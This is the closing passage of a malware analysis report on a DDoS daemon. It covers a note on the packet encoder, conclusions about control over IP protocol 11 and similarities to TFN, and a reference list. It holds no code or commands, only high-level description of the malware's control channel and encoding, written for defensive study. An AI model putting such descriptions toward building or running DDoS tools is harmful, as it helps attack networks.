400 and 600 bytes. Extending in the size of bufEncode to greater than 400
bytes results in additional data from bufClear, which is in clear text,
to be appended to the payload and transmitted as shown in the diagram above.
8. Conclusion and comments
The binary in question is a DDoS daemon that shares much similarities with
other DDoS tools like TFN [4], espcially in terms of control architecture
and features. It is controlled by a master that communicates with it via
IP protocol 11 packets. It is capable of carrying out a variety of DDoS attacks,
and has ample housekeeping functions.
The only interesting feature is the network encoder. But it turns out to
be a simple procedure that can be easily reverse engineered. That was why
we were able to craft encoded packets that we used to trigger the binary
and observe its network behaviour extensively.
One particularly puzzling "feature" is the choice of IP protocol 11 (0xb).
This is such an uncommon IP protocol. We seriously suspect that the usefulness
of the DDoS system will be severely limited, because whatever packets
sent by either the master or the slave, firewalls will block it, routers
will drop it, and IDSes will pick it out like a spotlight.
Because of this, we are inclined to think that this is a "lab" code, used
for experimentation in a lab. The choice of protocol seems more effective
for containment, not general use.
9. References
[1] IDA Pro Disassembler, http://www.datarescue.com/idabase
[2] Windows Emulator for Unix, http://www.winehq.com
[3] LibNet, http://libnet.sourceforge.net
[4] "The 'Tribe Flood Network' distributed denial of service attack tool",
http://staff.washington.edu/dittrich/misc/tfn.analysis, Dave Dittrich,
Oct 1999.
[5] Unix Programming FAQ, http://www.erlenstar.demon.co.uk/unix/faq_toc.html
[6] Internet Protocol Numbers, http://www.iana.org/assignments/protocol-numbers
[7] RFC741 - Specifications For The Network Voice Protocol, http://www.faqs.org/rfcs/rfc741.html
[8] CERT Incident Note IN-2000-04, "Denial of Service Attacks using Nameservers",
http://www.cert.org/incident_notes/IN-2000-04.html
[9] CERT Advisory CA-1996-21, "TCP SYN Flooding and IP Spoofing Attacks",
http://www.cert.org/advisories/CA-1996-21.html